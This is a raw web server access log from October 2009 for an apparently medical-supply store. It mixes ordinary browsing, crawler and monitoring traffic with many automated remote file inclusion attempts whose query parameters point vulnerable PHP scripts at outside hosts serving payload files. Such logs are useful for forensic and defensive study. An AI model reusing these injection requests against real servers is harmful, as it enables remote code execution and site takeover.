77.234.201.119 - - [12/Oct/2009:00:49:12 -0400] "GET //includes/themen_portal_mitte.php?phpbb_root_path=http://www.used-wheelchair.com/z.gif???? HTTP/1.1" 404 231 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
77.234.201.119 - - [12/Oct/2009:00:49:14 -0400] "GET //includes/themen_portal_mitte.php?phpbb_root_path=http://www.used-wheelchair.com/z.gif???? HTTP/1.1" 404 231 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
77.234.201.119 - - [12/Oct/2009:00:49:14 -0400] "GET /logs//includes/themen_portal_mitte.php?phpbb_root_path=http://www.used-wheelchair.com/z.gif???? HTTP/1.1" 404 236 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
209.59.12.99 - - [12/Oct/2009:00:49:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.30.81.156 - - [12/Oct/2009:00:51:38 -0400] "GET /logs/error_log.Q109070600 HTTP/1.0" 200 2489995 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.81.156 - - [12/Oct/2009:00:51:45 -0400] "GET /logs/error_log.Q109070600 HTTP/1.0" 200 2489995 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
193.4.113.98 - - [12/Oct/2009:00:54:24 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://arda.or.th/userfiles/id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
193.4.113.98 - - [12/Oct/2009:00:54:24 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://arda.or.th/userfiles/id1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
193.4.113.98 - - [12/Oct/2009:00:54:36 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://arda.or.th/userfiles/id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
193.4.113.98 - - [12/Oct/2009:00:54:36 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://arda.or.th/userfiles/id1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Oct/2009:00:54:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.186.196.125 - - [12/Oct/2009:00:58:38 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
67.186.196.125 - - [12/Oct/2009:00:58:38 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
67.186.196.125 - - [12/Oct/2009:00:58:39 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
67.186.196.125 - - [12/Oct/2009:00:58:39 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
67.186.196.125 - - [12/Oct/2009:00:58:40 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76790 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
67.186.196.125 - - [12/Oct/2009:00:58:41 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
67.186.196.125 - - [12/Oct/2009:00:58:41 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
67.186.196.125 - - [12/Oct/2009:00:58:41 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
67.186.196.125 - - [12/Oct/2009:00:58:41 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
67.186.196.125 - - [12/Oct/2009:00:58:41 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
67.186.196.125 - - [12/Oct/2009:00:58:41 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
67.186.196.125 - - [12/Oct/2009:00:58:41 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
67.186.196.125 - - [12/Oct/2009:00:58:41 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
67.186.196.125 - - [12/Oct/2009:00:58:41 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
67.186.196.125 - - [12/Oct/2009:00:58:41 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
67.186.196.125 - - [12/Oct/2009:00:58:41 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
67.186.196.125 - - [12/Oct/2009:00:58:41 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
67.186.196.125 - - [12/Oct/2009:00:58:41 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
67.186.196.125 - - [12/Oct/2009:00:58:49 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
67.186.196.125 - - [12/Oct/2009:00:58:49 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L317B13400C89C90036F800F+M37+ENG HTTP/1.1" 200 47159 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
67.186.196.125 - - [12/Oct/2009:00:58:50 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L317B13400C89C90036F800F+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
67.186.196.125 - - [12/Oct/2009:00:58:50 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L317B13400C89C90036F800F+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
67.186.196.125 - - [12/Oct/2009:00:58:50 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L317B13400C89C90036F800F+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
67.186.196.125 - - [12/Oct/2009:00:58:50 -0400] "GET /images/items/0100151_THUMB.JPG HTTP/1.1" 200 1926 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L317B13400C89C90036F800F+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
67.186.196.125 - - [12/Oct/2009:00:58:51 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L317B13400C89C90036F800F+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
67.186.196.125 - - [12/Oct/2009:00:58:51 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L317B13400C89C90036F800F+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
67.186.196.125 - - [12/Oct/2009:00:58:51 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L317B13400C89C90036F800F+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
67.186.196.125 - - [12/Oct/2009:00:58:51 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L317B13400C89C90036F800F+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
67.186.196.125 - - [12/Oct/2009:00:58:51 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L317B13400C89C90036F800F+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
67.186.196.125 - - [12/Oct/2009:00:58:51 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L317B13400C89C90036F800F+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
67.186.196.125 - - [12/Oct/2009:00:58:51 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L317B13400C89C90036F800F+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
67.186.196.125 - - [12/Oct/2009:00:58:51 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L317B13400C89C90036F800F+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
67.186.196.125 - - [12/Oct/2009:00:58:51 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L317B13400C89C90036F800F+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
67.186.196.125 - - [12/Oct/2009:00:58:51 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L317B13400C89C90036F800F+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
67.186.196.125 - - [12/Oct/2009:00:58:59 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L317B13490219290032A800F+M37+ENG HTTP/1.1" 200 38013 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L317B13400C89C90036F800F+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
67.186.196.125 - - [12/Oct/2009:00:59:02 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L317B13420129B9004B3800F+M37+ENG HTTP/1.1" 200 51067 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L317B13490219290032A800F+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
67.186.196.125 - - [12/Oct/2009:00:59:03 -0400] "GET /images/items/0031191_THUMB.JPG HTTP/1.1" 200 3852 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L317B13420129B9004B3800F+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
67.186.196.125 - - [12/Oct/2009:00:59:19 -0400] "GET /images/pf-b.gif HTTP/1.1" 200 813 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L317B13420129B9004B3800F+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
81.176.226.164 - - [12/Oct/2009:00:59:37 -0400] "GET /logs/access_log.Q109072400//?_SERVER[DOCUMENT_ROOT]=http://eksquad.110mb.com/IDtest.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
81.176.226.164 - - [12/Oct/2009:00:59:37 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://eksquad.110mb.com/IDtest.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
81.176.226.164 - - [12/Oct/2009:00:59:37 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://eksquad.110mb.com/IDtest.txt??? HTTP/1.1" 200 21523 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
209.59.12.99 - - [12/Oct/2009:00:59:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
81.176.226.164 - - [12/Oct/2009:01:00:08 -0400] "GET /logs/error_log.Q109072400//?_SERVER[DOCUMENT_ROOT]=http://eksquad.110mb.com/IDtest.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
72.30.81.156 - - [12/Oct/2009:01:01:15 -0400] "GET /logs/error_log.Q109052500 HTTP/1.0" 200 3102086 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.81.156 - - [12/Oct/2009:01:01:21 -0400] "GET /logs/error_log.Q109052500 HTTP/1.0" 200 3102086 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
93.187.234.69 - - [12/Oct/2009:01:02:01 -0400] "GET /logs/errors.php?error=http://pyungan.or.kr/bbs/.injek/id1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
201.219.3.163 - - [12/Oct/2009:01:03:06 -0400] "GET /logs/access_log.Q109070300//modules/vwar/admin/admin.php?vwar_root=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
201.219.3.163 - - [12/Oct/2009:01:03:30 -0400] "GET /logs/access_log.Q109060200//modules/vwar/admin/admin.php?vwar_root=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
72.30.81.156 - - [12/Oct/2009:01:04:42 -0400] "GET /logs/access_log.Q108110700 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [12/Oct/2009:01:04:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
81.12.13.152 - - [12/Oct/2009:01:07:52 -0400] "GET //?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
81.12.13.152 - - [12/Oct/2009:01:07:52 -0400] "GET /logs/access_log.Q109080200//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
81.12.13.152 - - [12/Oct/2009:01:07:52 -0400] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 21523 "-" "Mozilla/5.0"
81.12.13.152 - - [12/Oct/2009:01:07:56 -0400] "GET /logs/error_log.Q109080200//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Oct/2009:01:09:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
62.140.23.192 - - [12/Oct/2009:01:11:14 -0400] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
62.140.23.192 - - [12/Oct/2009:01:11:14 -0400] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
62.140.23.192 - - [12/Oct/2009:01:11:15 -0400] "GET /logs/access_log.Q109051800//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
62.140.23.192 - - [12/Oct/2009:01:11:15 -0400] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
62.140.23.192 - - [12/Oct/2009:01:11:15 -0400] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
62.140.23.192 - - [12/Oct/2009:01:11:15 -0400] "GET /logs/access_log.Q109051800//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
72.30.81.156 - - [12/Oct/2009:01:10:54 -0400] "GET /logs/access_log.Q109072900 HTTP/1.0" 200 4189147 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
62.140.23.192 - - [12/Oct/2009:01:14:26 -0400] "GET /logs/access_log.Q109070300%20%20//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
62.140.23.192 - - [12/Oct/2009:01:14:26 -0400] "GET /logs/access_log.Q109092200%20%20//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
62.140.23.192 - - [12/Oct/2009:01:14:36 -0400] "GET /logs/access_log.Q109070300%20%20//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
62.140.23.192 - - [12/Oct/2009:01:14:37 -0400] "GET /logs/access_log.Q109092200%20%20//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Oct/2009:01:14:51 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
220.181.7.92 - - [12/Oct/2009:01:15:57 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.125.66.127 - - [12/Oct/2009:01:16:10 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
210.127.253.244 - - [12/Oct/2009:01:16:26 -0400] "GET /logs/access_log.Q109061200/?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
210.127.253.244 - - [12/Oct/2009:01:16:26 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
210.127.253.244 - - [12/Oct/2009:01:16:30 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 200 21518 "-" "Mozilla/5.0"
210.127.253.244 - - [12/Oct/2009:01:16:39 -0400] "GET /logs/access_log.Q109062400/?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
62.140.23.192 - - [12/Oct/2009:01:19:49 -0400] "GET /logs/access_log.Q109071100//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
62.140.23.192 - - [12/Oct/2009:01:19:51 -0400] "GET /logs/access_log.Q109071100//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Oct/2009:01:19:51 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
93.187.234.69 - - [12/Oct/2009:01:20:06 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://pyungan.or.kr/bbs/.injek/id1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
93.187.234.69 - - [12/Oct/2009:01:20:06 -0400] "GET //index.php?DOCUMENT_ROOT=http://pyungan.or.kr/bbs/.injek/id1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
93.187.234.69 - - [12/Oct/2009:01:20:06 -0400] "GET /logs/access_log.Q109092200//index.php?DOCUMENT_ROOT=http://pyungan.or.kr/bbs/.injek/id1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
93.187.234.69 - - [12/Oct/2009:01:20:44 -0400] "GET /logs/access_log.Q109092200%20%20//index.php?DOCUMENT_ROOT=http://pyungan.or.kr/bbs/.injek/id1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
82.193.15.3 - - [12/Oct/2009:01:21:25 -0400] "GET /logs/access_log.Q109053100////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
82.193.15.3 - - [12/Oct/2009:01:22:03 -0400] "GET /logs/access_log.Q109052800////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
211.111.160.5 - - [12/Oct/2009:01:23:03 -0400] "GET /logs/access_log.Q109092200//index.php?DOCUMENT_ROOT=http://www.seorakhoney.com/shop/mail/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.111.160.5 - - [12/Oct/2009:01:23:03 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.seorakhoney.com/shop/mail/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.111.160.5 - - [12/Oct/2009:01:23:03 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.seorakhoney.com/shop/mail/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
